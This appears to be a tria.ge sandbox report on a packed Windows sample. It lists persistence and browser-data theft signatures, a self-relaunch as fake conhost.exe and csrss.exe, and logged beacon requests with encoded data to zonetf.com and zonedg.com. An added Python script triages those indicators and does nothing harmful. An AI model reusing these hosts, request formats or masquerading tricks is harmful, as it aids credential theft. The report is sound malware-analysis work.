Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Analysis

  • max time kernel
    142s
  • max time network
    133s
  • platform
    windows7_x64
  • resource
    win7-20231129-en
  • resource tags

    arch:x64, arch:x86, image:win7-20231129-en, locale:en-us, os:windows7-x64, system
  • submitted
    30/12/2023, 01:58 UTC

General

  • Target

    0ae3c3d40e9e2f9a607eb122945fd806.exe

  • Size

    177KB

  • MD5

    0ae3c3d40e9e2f9a607eb122945fd806

  • SHA1

    44144fd58f1402d7e9fb9f79d8b1db8e47eb9ca0

  • SHA256

    7df7cc25adec4db367b0ac4e3428672d773820a9f4fdfbf0346cd2e31225c59c

  • SHA512

    cf28b7a0ebb6d3abae6ab213bc8ea492d3d799d9d23439f13ba9b9df64f28e24f60be3fc5047fda608780555aea9135708c532214b8aa39bf3783709934e041f

  • SSDEEP

    3072:jAtbd/WSkwyW62FL0/qtCnkvTnlMMF1SJhinKxP6bqbrqjMVdTdws0lft2zn+lz5:0D/2ZrnGnpLnKx1brqjeRxEPlzGG

Malware Config

Signatures

  • Modifies WinLogon for persistence (2 TTPs, 1 IoC)
  • Reads user/profile data of web browsers (2 TTPs)

    Infostealers often target stored browser data, which can include saved credentials.

  • UPX packed file (5 IoCs)

    Detects executables packed with UPX or a modified UPX open-source packer.

  • Suspicious use of WriteProcessMemory (8 IoCs)

Processes

  • C:\Users\Admin\AppData\Local\Temp\0ae3c3d40e9e2f9a607eb122945fd806.exe (PID 2320, level 1)
    Command line: "C:\Users\Admin\AppData\Local\Temp\0ae3c3d40e9e2f9a607eb122945fd806.exe"
    • Modifies WinLogon for persistence
    • Suspicious use of WriteProcessMemory
    • C:\Users\Admin\AppData\Local\Temp\0ae3c3d40e9e2f9a607eb122945fd806.exe (PID 804, level 2, child of 2320)
      Command line: C:\Users\Admin\AppData\Local\Temp\0ae3c3d40e9e2f9a607eb122945fd806.exe startC:\Users\Admin\AppData\Roaming\Microsoft\conhost.exe%C:\Users\Admin\AppData\Roaming\Microsoft
    • C:\Users\Admin\AppData\Local\Temp\0ae3c3d40e9e2f9a607eb122945fd806.exe (PID 2188, level 2, child of 2320)
      Command line: C:\Users\Admin\AppData\Local\Temp\0ae3c3d40e9e2f9a607eb122945fd806.exe startC:\Users\Admin\AppData\Local\Temp\csrss.exe%C:\Users\Admin\AppData\Local\Temp
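
Two things in the process tree and the signature list above deserve a host-side check. Both children relaunch the sample with an argument of the form start<path>%<directory>, and the paths they name are conhost.exe and csrss.exe in the user profile: both names belong to binaries that live only under System32, so finding them anywhere else is masquerading. The "Modifies WinLogon for persistence" signature says which key was touched but not which value. The script below is an added example, not tria.ge's code: it parses the relaunch argument, flags system-binary names outside System32, and diffs Winlogon Shell/Userinit values against their Windows 7 defaults. The command lines are copied from the report; the post-infection Winlogon export is constructed for the demo, since the report does not show the actual value.

```python
"""Host triage for the process tree above: parse the relaunch argument, flag
system-binary names dropped outside System32, and diff Winlogon values against
their defaults. Added example; not tria.ge's code."""
import ntpath
import re

# Copied from the report's process tree (PIDs 804 and 2188).
CHILD_CMDLINES = [
    r"C:\Users\Admin\AppData\Local\Temp\0ae3c3d40e9e2f9a607eb122945fd806.exe "
    r"startC:\Users\Admin\AppData\Roaming\Microsoft\conhost.exe%C:\Users\Admin\AppData\Roaming\Microsoft",
    r"C:\Users\Admin\AppData\Local\Temp\0ae3c3d40e9e2f9a607eb122945fd806.exe "
    r"startC:\Users\Admin\AppData\Local\Temp\csrss.exe%C:\Users\Admin\AppData\Local\Temp",
]

# Executables that legitimately exist only under %SystemRoot%\System32 (or SysWOW64).
SYSTEM_BINARY_NAMES = {"conhost.exe", "csrss.exe", "svchost.exe", "lsass.exe",
                       "winlogon.exe", "smss.exe", "services.exe"}
SYSTEM_DIRS = ("c:\\windows\\system32\\", "c:\\windows\\syswow64\\")

# Default values of HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon on
# Windows 7; the trailing comma on Userinit is part of the default.
WINLOGON_DEFAULTS = {
    "Shell": "explorer.exe",
    "Userinit": r"C:\Windows\system32\userinit.exe,",
}

# Hypothetical export of the same key after infection. The report states only that
# Winlogon was modified, not which value, so this input is constructed for the demo.
SUSPICIOUS_WINLOGON = {
    "Shell": "explorer.exe",
    "Userinit": r"C:\Windows\system32\userinit.exe,C:\Users\Admin\AppData\Roaming\Microsoft\conhost.exe,",
}

# '<exe> start<target>%<workdir>': no space after 'start', '%' separates the two paths.
START_ARG = re.compile(r"^(?P<exe>.+?\.exe) start(?P<target>[^%]+)%(?P<workdir>.+)$", re.IGNORECASE)


def parse_start_arg(cmdline):
    """Return {'exe', 'target', 'workdir'} for the relaunch form, else None."""
    m = START_ARG.match(cmdline.strip())
    return m.groupdict() if m else None


def masquerade_finding(path):
    """A system-binary name outside System32/SysWOW64 is a masquerading copy."""
    name = ntpath.basename(path).lower()
    if name in SYSTEM_BINARY_NAMES and not path.lower().startswith(SYSTEM_DIRS):
        return f"{name} expected under System32, found at {path}"
    return None


def winlogon_findings(values):
    """Report Shell/Userinit values that differ from the defaults; appended
    comma-separated entries are the usual Winlogon persistence trick."""
    findings = []
    for name, default in WINLOGON_DEFAULTS.items():
        actual = values.get(name)
        if actual is not None and actual.strip().lower() != default.lower():
            findings.append(f"Winlogon\\{name} = {actual!r} (default {default!r})")
    return findings


def triage(cmdlines, winlogon_values):
    """Combine the three checks into one list of findings."""
    findings = []
    for cmd in cmdlines:
        parsed = parse_start_arg(cmd)
        if parsed is None:
            continue
        findings.append(f"relaunch target {parsed['target']} (workdir {parsed['workdir']})")
        hit = masquerade_finding(parsed["target"])
        if hit:
            findings.append(hit)
    findings.extend(winlogon_findings(winlogon_values))
    return findings


if __name__ == "__main__":
    for line in triage(CHILD_CMDLINES, SUSPICIOUS_WINLOGON):
        print(line)
```

On a live host the Winlogon values would come from `reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon"`; the comparison is case-insensitive because the registry is, and the trailing comma on Userinit is kept deliberately so that an appended second entry stands out.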

      Network

      • [US] DNS
        blenderartists.org
        0ae3c3d40e9e2f9a607eb122945fd806.exe
        Remote address:
        8.8.8.8:53
        Request
        blenderartists.org
        IN A
        Response
        blenderartists.org
        IN A
        104.21.49.24
        blenderartists.org
        IN A
        172.67.188.202
      • [US] GET
        http://blenderartists.org/external/Banners/facebook.jpg?tq=gP4aKydIqyAboVCNpL3pfP6zLr%2BdnIY9CF9%2FqGMXOPP6kR%2BOJDEfn1GTciigZE08HsfWxRKDeoo7929FHjdwfP3E9pT4L9YlPNR7LkxzhnUE7tHaqQLENEWt1obNGbLghRcYAmJPgya%2Fmdl180VD79q1NIBHTHWVEfHTX%2Fa%2BjxCTFve%2BD3DVvi7GNxNO4p%2FsBhaWaZtqyNVniK7dIBdixaSH9KIL9oROg8eIPZJ6VtZlDXC7T4sTLN2gk85kssRhpaaQ%2Fq3WT7Z0x99%2BrH3ODkv5MupCLfJOjjWYyy%2Bm2ca80l0PaUG8jHF67JeOknA%2BY%2FaHvZmSE6mlT3uXmIiGxdBM61iu9s%2BXOUvFAI3DG9EXYaz8YKSS2PqVRZ9MeXMCONc6rn6fDN96J3Lo4DeK5EI%2BHd1ORPxogQqO5d2PFQY2v1%2FBOaPVElkvmrUed91wLFfqyTz8SxdzS9Vxh4sadaFR0oijJJhBZWG0ew6M0WUa62Ye7E9DNK0K6%2FlFea8FQokVFdSpwoGRuJNyinL3cd3EAWnrkZOj5mD2uBD5RO6B4e%2BUfJd
        0ae3c3d40e9e2f9a607eb122945fd806.exe
        Remote address:
        104.21.49.24:80
        Request
        GET /external/Banners/facebook.jpg?tq=gP4aKydIqyAboVCNpL3pfP6zLr%2BdnIY9CF9%2FqGMXOPP6kR%2BOJDEfn1GTciigZE08HsfWxRKDeoo7929FHjdwfP3E9pT4L9YlPNR7LkxzhnUE7tHaqQLENEWt1obNGbLghRcYAmJPgya%2Fmdl180VD79q1NIBHTHWVEfHTX%2Fa%2BjxCTFve%2BD3DVvi7GNxNO4p%2FsBhaWaZtqyNVniK7dIBdixaSH9KIL9oROg8eIPZJ6VtZlDXC7T4sTLN2gk85kssRhpaaQ%2Fq3WT7Z0x99%2BrH3ODkv5MupCLfJOjjWYyy%2Bm2ca80l0PaUG8jHF67JeOknA%2BY%2FaHvZmSE6mlT3uXmIiGxdBM61iu9s%2BXOUvFAI3DG9EXYaz8YKSS2PqVRZ9MeXMCONc6rn6fDN96J3Lo4DeK5EI%2BHd1ORPxogQqO5d2PFQY2v1%2FBOaPVElkvmrUed91wLFfqyTz8SxdzS9Vxh4sadaFR0oijJJhBZWG0ew6M0WUa62Ye7E9DNK0K6%2FlFea8FQokVFdSpwoGRuJNyinL3cd3EAWnrkZOj5mD2uBD5RO6B4e%2BUfJd HTTP/1.0
        Connection: close
        Host: blenderartists.org
        Accept: */*
        User-Agent: iamx/3.11
        Response
        HTTP/1.1 301 Moved Permanently
        Date: Sat, 30 Dec 2023 15:06:48 GMT
        Connection: close
        Cache-Control: max-age=3600
        Expires: Sat, 30 Dec 2023 16:06:48 GMT
        Location: https://blenderartists.org/external/Banners/facebook.jpg?tq=gP4aKydIqyAboVCNpL3pfP6zLr%2BdnIY9CF9%2FqGMXOPP6kR%2BOJDEfn1GTciigZE08HsfWxRKDeoo7929FHjdwfP3E9pT4L9YlPNR7LkxzhnUE7tHaqQLENEWt1obNGbLghRcYAmJPgya%2Fmdl180VD79q1NIBHTHWVEfHTX%2Fa%2BjxCTFve%2BD3DVvi7GNxNO4p%2FsBhaWaZtqyNVniK7dIBdixaSH9KIL9oROg8eIPZJ6VtZlDXC7T4sTLN2gk85kssRhpaaQ%2Fq3WT7Z0x99%2BrH3ODkv5MupCLfJOjjWYyy%2Bm2ca80l0PaUG8jHF67JeOknA%2BY%2FaHvZmSE6mlT3uXmIiGxdBM61iu9s%2BXOUvFAI3DG9EXYaz8YKSS2PqVRZ9MeXMCONc6rn6fDN96J3Lo4DeK5EI%2BHd1ORPxogQqO5d2PFQY2v1%2FBOaPVElkvmrUed91wLFfqyTz8SxdzS9Vxh4sadaFR0oijJJhBZWG0ew6M0WUa62Ye7E9DNK0K6%2FlFea8FQokVFdSpwoGRuJNyinL3cd3EAWnrkZOj5mD2uBD5RO6B4e%2BUfJd
        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=I2Bmo4viQMV%2F0oN7ImkPqE2Z4iNOZ64euHvXx%2BJh9p2Jow%2FFK1NZRYXTQMhRu%2FycSMtDKO8WyLAEbFOxVY0seKMUzRbypib1BhjPr5Lnp02AK1Hgj9xXae%2BatLQu0htCMDaaZFs%3D"}],"group":"cf-nel","max_age":604800}
        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
        Server: cloudflare
        CF-RAY: 83db3052fa337725-LHR
        alt-svc: h3=":443"; ma=86400
      • [US] DNS
        zonetf.com
        0ae3c3d40e9e2f9a607eb122945fd806.exe
        Remote address:
        8.8.8.8:53
        Request
        zonetf.com
        IN A
        Response
        zonetf.com
        IN A
        212.32.237.92
      • [NL] POST
        http://zonetf.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfJuX%2BP9h%2BI0sDkX9PiwomL2GUvg7sbefvJsSvT8t61i9hlL9PmxrHH0bV%2FmiMWrdPd5SOeikL50gB484P22qHDzGT7iisepA4JvO5D60alxtygbpb6HvnSAMRu4pVKv975Xlm5G
        0ae3c3d40e9e2f9a607eb122945fd806.exe
        Remote address:
        212.32.237.92:80
        Request
        POST /index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfJuX%2BP9h%2BI0sDkX9PiwomL2GUvg7sbefvJsSvT8t61i9hlL9PmxrHH0bV%2FmiMWrdPd5SOeikL50gB484P22qHDzGT7iisepA4JvO5D60alxtygbpb6HvnSAMRu4pVKv975Xlm5G HTTP/1.1
        Host: zonetf.com
        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
        Content-Length: 0
        Connection: close
        Response
        HTTP/1.1 302 Found
        cache-control: max-age=0, private, must-revalidate
        connection: close
        content-length: 11
        date: Sat, 30 Dec 2023 15:06:37 GMT
        location: http://survey-smiles.com
        server: nginx
        set-cookie: sid=0737a038-a725-11ee-b50a-ae3f094d6636; path=/; domain=.zonetf.com; expires=Thu, 17 Jan 2092 18:20:44 GMT; max-age=2147483647; HttpOnly
      • [NL] POST
        http://zonetf.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfJuX%2BP9h%2BI0sDkX9PiwomL2GUvg7sbefvJsSvT8t61i9hlL9PmxrHH0bV%2FmiMWrdPd5SOeikL50gB484P22qHDzGT7iisepA4JvO5D60alxtygbpb6HvnSAOQij%2B8yjYvEaSvT%2BsqtSr%2Fe%2BV5ZuRg%3D%3D
        0ae3c3d40e9e2f9a607eb122945fd806.exe
        Remote address:
        212.32.237.92:80
        Request
        POST /index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfJuX%2BP9h%2BI0sDkX9PiwomL2GUvg7sbefvJsSvT8t61i9hlL9PmxrHH0bV%2FmiMWrdPd5SOeikL50gB484P22qHDzGT7iisepA4JvO5D60alxtygbpb6HvnSAOQij%2B8yjYvEaSvT%2BsqtSr%2Fe%2BV5ZuRg%3D%3D HTTP/1.1
        Host: zonetf.com
        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
        Content-Length: 0
        Connection: close
        Response
        HTTP/1.1 302 Found
        cache-control: max-age=0, private, must-revalidate
        connection: close
        content-length: 11
        date: Sat, 30 Dec 2023 15:06:46 GMT
        location: http://survey-smiles.com
        server: nginx
        set-cookie: sid=0d31d49d-a725-11ee-8f28-ae3f97f7d132; path=/; domain=.zonetf.com; expires=Thu, 17 Jan 2092 18:20:54 GMT; max-age=2147483647; HttpOnly
      • [NL] POST
        http://zonetf.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfJuX%2BP9h%2BI0sDkX9PiwomL2GUvg7sbefvJsSvT8t61i9hlL9PmxrHH0bV%2FmiMWrdPd5SOeikL50gB484P22qHDzGT7iisepA4JvO5D60alxtygbpb6HvnSAOQij%2B8OoYvEaSPT%2BsqtSr%2Fe%2BV5ZuRg%3D%3D
        0ae3c3d40e9e2f9a607eb122945fd806.exe
        Remote address:
        212.32.237.92:80
        Request
        POST /index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfJuX%2BP9h%2BI0sDkX9PiwomL2GUvg7sbefvJsSvT8t61i9hlL9PmxrHH0bV%2FmiMWrdPd5SOeikL50gB484P22qHDzGT7iisepA4JvO5D60alxtygbpb6HvnSAOQij%2B8OoYvEaSPT%2BsqtSr%2Fe%2BV5ZuRg%3D%3D HTTP/1.1
        Host: zonetf.com
        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
        Content-Length: 0
        Connection: close
        Response
        HTTP/1.1 302 Found
        cache-control: max-age=0, private, must-revalidate
        connection: close
        content-length: 11
        date: Sat, 30 Dec 2023 15:06:49 GMT
        location: http://survey-smiles.com
        server: nginx
        set-cookie: sid=0e680353-a725-11ee-a4da-ae3f87cde345; path=/; domain=.zonetf.com; expires=Thu, 17 Jan 2092 18:20:56 GMT; max-age=2147483647; HttpOnly
      • [US] DNS
        zonedg.com
        0ae3c3d40e9e2f9a607eb122945fd806.exe
        Remote address:
        8.8.8.8:53
        Request
        zonedg.com
        IN A
        Response
        zonedg.com
        IN A
        206.238.216.8
      • [US] DNS
        zonedg.com
        0ae3c3d40e9e2f9a607eb122945fd806.exe
        Remote address:
        8.8.8.8:53
        Request
        zonedg.com
        IN A
      • [SG] GET
        http://zonedg.com/images/im133.jpg?tq=gKZEtzyMv5rJqxG1J42pzMffBvcj0ujbwvgS917V65rJqlLfgPiWW1cg
        0ae3c3d40e9e2f9a607eb122945fd806.exe
        Remote address:
        206.238.216.8:80
        Request
        GET /images/im133.jpg?tq=gKZEtzyMv5rJqxG1J42pzMffBvcj0ujbwvgS917V65rJqlLfgPiWW1cg HTTP/1.0
        Connection: close
        Host: zonedg.com
        Accept: */*
        User-Agent: iamx/3.11
        Response
        HTTP/1.1 301 Moved Permanently
        Content-Length: 0
        Server: nginx
        Location: http://www.zonedg.com/images/im133.jpg?tq=gKZEtzyMv5rJqxG1J42pzMffBvcj0ujbwvgS917V65rJqlLfgPiWW1cg
        Content-Type: text/html
      • [NL] POST
        http://zonetf.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfJuX%2BP9h%2BI0sDkX9PiwomL2GUvg7sbefvJsSvT8t61i9hlL9PmxrHH0bV%2FmiMWrdPd5SOeikL50gB484P22qHDzGT7iisepA4JvO5D60alxtygbpb6HvnSAOQij%2B8yvUq%2F3vleWbkY%3D
        0ae3c3d40e9e2f9a607eb122945fd806.exe
        Remote address:
        212.32.237.92:80
        Request
        POST /index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfJuX%2BP9h%2BI0sDkX9PiwomL2GUvg7sbefvJsSvT8t61i9hlL9PmxrHH0bV%2FmiMWrdPd5SOeikL50gB484P22qHDzGT7iisepA4JvO5D60alxtygbpb6HvnSAOQij%2B8yvUq%2F3vleWbkY%3D HTTP/1.1
        Host: zonetf.com
        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
        Content-Length: 0
        Connection: close
        Response
        HTTP/1.1 302 Found
        cache-control: max-age=0, private, must-revalidate
        connection: close
        content-length: 11
        date: Sat, 30 Dec 2023 15:06:54 GMT
        location: http://survey-smiles.com
        server: nginx
        set-cookie: sid=11831a6d-a725-11ee-bb58-ae3f07fba5f8; path=/; domain=.zonetf.com; expires=Thu, 17 Jan 2092 18:21:01 GMT; max-age=2147483647; HttpOnly
      • [NL] POST
        http://zonetf.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfJuX%2BP9h%2BI0sDkX9PiwomL2GUvg7sbefvJsSvT8t61i9hlL9PmxrHH0bV%2FmiMWrdPd5SOeikL50gB484P22qHDzGT7iisepA4JvO5D60alxtygbpb6HvnSAOQij%2B82uYvEaSvT%2BsqlSr%2Fe%2BV5ZuRg%3D%3D
        0ae3c3d40e9e2f9a607eb122945fd806.exe
        Remote address:
        212.32.237.92:80
        Request
        POST /index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfJuX%2BP9h%2BI0sDkX9PiwomL2GUvg7sbefvJsSvT8t61i9hlL9PmxrHH0bV%2FmiMWrdPd5SOeikL50gB484P22qHDzGT7iisepA4JvO5D60alxtygbpb6HvnSAOQij%2B82uYvEaSvT%2BsqlSr%2Fe%2BV5ZuRg%3D%3D HTTP/1.1
        Host: zonetf.com
        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
        Content-Length: 0
        Connection: close
        Response
        HTTP/1.1 302 Found
        cache-control: max-age=0, private, must-revalidate
        connection: close
        content-length: 11
        date: Sat, 30 Dec 2023 15:07:00 GMT
        location: http://survey-smiles.com
        server: nginx
        set-cookie: sid=150f2a65-a725-11ee-b34c-ae3fea10aeff; path=/; domain=.zonetf.com; expires=Thu, 17 Jan 2092 18:21:07 GMT; max-age=2147483647; HttpOnly
      • [SG] GET
        http://zonedg.com/images/im133.jpg?tq=gKZEtzyMv5rJqxG1J42pzMffBvcj0ujbwvgS917X65rJqlLfgPiWW1cg
        0ae3c3d40e9e2f9a607eb122945fd806.exe
        Remote address:
        206.238.216.8:80
        Request
        GET /images/im133.jpg?tq=gKZEtzyMv5rJqxG1J42pzMffBvcj0ujbwvgS917X65rJqlLfgPiWW1cg HTTP/1.0
        Connection: close
        Host: zonedg.com
        Accept: */*
        User-Agent: iamx/3.11
        Response
        HTTP/1.1 301 Moved Permanently
        Content-Length: 0
        Server: nginx
        Location: http://www.zonedg.com/images/im133.jpg?tq=gKZEtzyMv5rJqxG1J42pzMffBvcj0ujbwvgS917X65rJqlLfgPiWW1cg
        Content-Type: text/html
      • [NL] POST
        http://zonetf.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfJuX%2BP9h%2BI0sDkX9PiwomL2GUvg7sbefvJsSvT8t61i9hlL9PmxrHH0bV%2FmiMWrdPd5SOeikL50gB484P22qHDzGT7iisepA4JvO5D60alxtygbpb6HvnSAOQij%2B8yvUq%2F3vleWbkY%3D
        0ae3c3d40e9e2f9a607eb122945fd806.exe
        Remote address:
        212.32.237.92:80
        Request
        POST /index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfJuX%2BP9h%2BI0sDkX9PiwomL2GUvg7sbefvJsSvT8t61i9hlL9PmxrHH0bV%2FmiMWrdPd5SOeikL50gB484P22qHDzGT7iisepA4JvO5D60alxtygbpb6HvnSAOQij%2B8yvUq%2F3vleWbkY%3D HTTP/1.1
        Host: zonetf.com
        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
        Content-Length: 0
        Connection: close
        Response
        HTTP/1.1 302 Found
        cache-control: max-age=0, private, must-revalidate
        connection: close
        content-length: 11
        date: Sat, 30 Dec 2023 15:07:04 GMT
        location: http://survey-smiles.com
        server: nginx
        set-cookie: sid=17ed9179-a725-11ee-8383-ae3f998aec03; path=/; domain=.zonetf.com; expires=Thu, 17 Jan 2092 18:21:12 GMT; max-age=2147483647; HttpOnly
      • [NL] POST
        http://zonetf.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfJuX%2BP9h%2BI0sDkX9PiwomL2GUvg7sbefvJsSvT8t61i9hlL9PmxrHH0bV%2FmiMWrdPd5SOeikL50gB484P22qHDzGT7iisepA4JvO5D60alxtygbpb6HvnSAOQij%2B82uYvEaSPT%2BsqNSr%2Fe%2BV5ZuRg%3D%3D
        0ae3c3d40e9e2f9a607eb122945fd806.exe
        Remote address:
        212.32.237.92:80
        Request
        POST /index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfJuX%2BP9h%2BI0sDkX9PiwomL2GUvg7sbefvJsSvT8t61i9hlL9PmxrHH0bV%2FmiMWrdPd5SOeikL50gB484P22qHDzGT7iisepA4JvO5D60alxtygbpb6HvnSAOQij%2B82uYvEaSPT%2BsqNSr%2Fe%2BV5ZuRg%3D%3D HTTP/1.1
        Host: zonetf.com
        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
        Content-Length: 0
        Connection: close
        Response
        HTTP/1.1 302 Found
        cache-control: max-age=0, private, must-revalidate
        connection: close
        content-length: 11
        date: Sat, 30 Dec 2023 15:07:04 GMT
        location: http://survey-smiles.com
        server: nginx
        set-cookie: sid=17ee8098-a725-11ee-9f71-ae3fe9ca28d4; path=/; domain=.zonetf.com; expires=Thu, 17 Jan 2092 18:21:12 GMT; max-age=2147483647; HttpOnly
      • 104.21.49.24:80
        http://blenderartists.org/external/Banners/facebook.jpg?tq=gP4aKydIqyAboVCNpL3pfP6zLr%2BdnIY9CF9%2FqGMXOPP6kR%2BOJDEfn1GTciigZE08HsfWxRKDeoo7929FHjdwfP3E9pT4L9YlPNR7LkxzhnUE7tHaqQLENEWt1obNGbLghRcYAmJPgya%2Fmdl180VD79q1NIBHTHWVEfHTX%2Fa%2BjxCTFve%2BD3DVvi7GNxNO4p%2FsBhaWaZtqyNVniK7dIBdixaSH9KIL9oROg8eIPZJ6VtZlDXC7T4sTLN2gk85kssRhpaaQ%2Fq3WT7Z0x99%2BrH3ODkv5MupCLfJOjjWYyy%2Bm2ca80l0PaUG8jHF67JeOknA%2BY%2FaHvZmSE6mlT3uXmIiGxdBM61iu9s%2BXOUvFAI3DG9EXYaz8YKSS2PqVRZ9MeXMCONc6rn6fDN96J3Lo4DeK5EI%2BHd1ORPxogQqO5d2PFQY2v1%2FBOaPVElkvmrUed91wLFfqyTz8SxdzS9Vxh4sadaFR0oijJJhBZWG0ew6M0WUa62Ye7E9DNK0K6%2FlFea8FQokVFdSpwoGRuJNyinL3cd3EAWnrkZOj5mD2uBD5RO6B4e%2BUfJd
        protocol: http
        process: 0ae3c3d40e9e2f9a607eb122945fd806.exe
        sent: 1.9kB (9 packets)
        received: 1.5kB (5 packets)

        HTTP Request

        GET http://blenderartists.org/external/Banners/facebook.jpg?tq=gP4aKydIqyAboVCNpL3pfP6zLr%2BdnIY9CF9%2FqGMXOPP6kR%2BOJDEfn1GTciigZE08HsfWxRKDeoo7929FHjdwfP3E9pT4L9YlPNR7LkxzhnUE7tHaqQLENEWt1obNGbLghRcYAmJPgya%2Fmdl180VD79q1NIBHTHWVEfHTX%2Fa%2BjxCTFve%2BD3DVvi7GNxNO4p%2FsBhaWaZtqyNVniK7dIBdixaSH9KIL9oROg8eIPZJ6VtZlDXC7T4sTLN2gk85kssRhpaaQ%2Fq3WT7Z0x99%2BrH3ODkv5MupCLfJOjjWYyy%2Bm2ca80l0PaUG8jHF67JeOknA%2BY%2FaHvZmSE6mlT3uXmIiGxdBM61iu9s%2BXOUvFAI3DG9EXYaz8YKSS2PqVRZ9MeXMCONc6rn6fDN96J3Lo4DeK5EI%2BHd1ORPxogQqO5d2PFQY2v1%2FBOaPVElkvmrUed91wLFfqyTz8SxdzS9Vxh4sadaFR0oijJJhBZWG0ew6M0WUa62Ye7E9DNK0K6%2FlFea8FQokVFdSpwoGRuJNyinL3cd3EAWnrkZOj5mD2uBD5RO6B4e%2BUfJd

        HTTP Response

        301
      • 212.32.237.92:80
        http://zonetf.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfJuX%2BP9h%2BI0sDkX9PiwomL2GUvg7sbefvJsSvT8t61i9hlL9PmxrHH0bV%2FmiMWrdPd5SOeikL50gB484P22qHDzGT7iisepA4JvO5D60alxtygbpb6HvnSAMRu4pVKv975Xlm5G
        protocol: http
        process: 0ae3c3d40e9e2f9a607eb122945fd806.exe
        sent: 912 B (6 packets)
        received: 567 B (5 packets)

        HTTP Request

        POST http://zonetf.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfJuX%2BP9h%2BI0sDkX9PiwomL2GUvg7sbefvJsSvT8t61i9hlL9PmxrHH0bV%2FmiMWrdPd5SOeikL50gB484P22qHDzGT7iisepA4JvO5D60alxtygbpb6HvnSAMRu4pVKv975Xlm5G

        HTTP Response

        302
      • 212.32.237.92:80
        http://zonetf.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfJuX%2BP9h%2BI0sDkX9PiwomL2GUvg7sbefvJsSvT8t61i9hlL9PmxrHH0bV%2FmiMWrdPd5SOeikL50gB484P22qHDzGT7iisepA4JvO5D60alxtygbpb6HvnSAOQij%2B8yjYvEaSvT%2BsqtSr%2Fe%2BV5ZuRg%3D%3D
        protocol: http
        process: 0ae3c3d40e9e2f9a607eb122945fd806.exe
        sent: 1.4kB (8 packets)
        received: 527 B (4 packets)

        HTTP Request

        POST http://zonetf.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfJuX%2BP9h%2BI0sDkX9PiwomL2GUvg7sbefvJsSvT8t61i9hlL9PmxrHH0bV%2FmiMWrdPd5SOeikL50gB484P22qHDzGT7iisepA4JvO5D60alxtygbpb6HvnSAOQij%2B8yjYvEaSvT%2BsqtSr%2Fe%2BV5ZuRg%3D%3D

        HTTP Response

        302
      • 212.32.237.92:80
        http://zonetf.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfJuX%2BP9h%2BI0sDkX9PiwomL2GUvg7sbefvJsSvT8t61i9hlL9PmxrHH0bV%2FmiMWrdPd5SOeikL50gB484P22qHDzGT7iisepA4JvO5D60alxtygbpb6HvnSAOQij%2B8OoYvEaSPT%2BsqtSr%2Fe%2BV5ZuRg%3D%3D
        protocol: http
        process: 0ae3c3d40e9e2f9a607eb122945fd806.exe
        sent: 631 B (6 packets)
        received: 527 B (4 packets)

        HTTP Request

        POST http://zonetf.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfJuX%2BP9h%2BI0sDkX9PiwomL2GUvg7sbefvJsSvT8t61i9hlL9PmxrHH0bV%2FmiMWrdPd5SOeikL50gB484P22qHDzGT7iisepA4JvO5D60alxtygbpb6HvnSAOQij%2B8OoYvEaSPT%2BsqtSr%2Fe%2BV5ZuRg%3D%3D

        HTTP Response

        302
      • 206.238.216.8:80
        http://zonedg.com/images/im133.jpg?tq=gKZEtzyMv5rJqxG1J42pzMffBvcj0ujbwvgS917V65rJqlLfgPiWW1cg
        protocol: http
        process: 0ae3c3d40e9e2f9a607eb122945fd806.exe
        sent: 961 B (10 packets)
        received: 670 B (6 packets)

        HTTP Request

        GET http://zonedg.com/images/im133.jpg?tq=gKZEtzyMv5rJqxG1J42pzMffBvcj0ujbwvgS917V65rJqlLfgPiWW1cg

        HTTP Response

        301
      • 212.32.237.92:80
        http://zonetf.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfJuX%2BP9h%2BI0sDkX9PiwomL2GUvg7sbefvJsSvT8t61i9hlL9PmxrHH0bV%2FmiMWrdPd5SOeikL50gB484P22qHDzGT7iisepA4JvO5D60alxtygbpb6HvnSAOQij%2B8yvUq%2F3vleWbkY%3D
        protocol: http
        process: 0ae3c3d40e9e2f9a607eb122945fd806.exe
        sent: 613 B (6 packets)
        received: 567 B (5 packets)

        HTTP Request

        POST http://zonetf.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfJuX%2BP9h%2BI0sDkX9PiwomL2GUvg7sbefvJsSvT8t61i9hlL9PmxrHH0bV%2FmiMWrdPd5SOeikL50gB484P22qHDzGT7iisepA4JvO5D60alxtygbpb6HvnSAOQij%2B8yvUq%2F3vleWbkY%3D

        HTTP Response

        302
      • 212.32.237.92:80
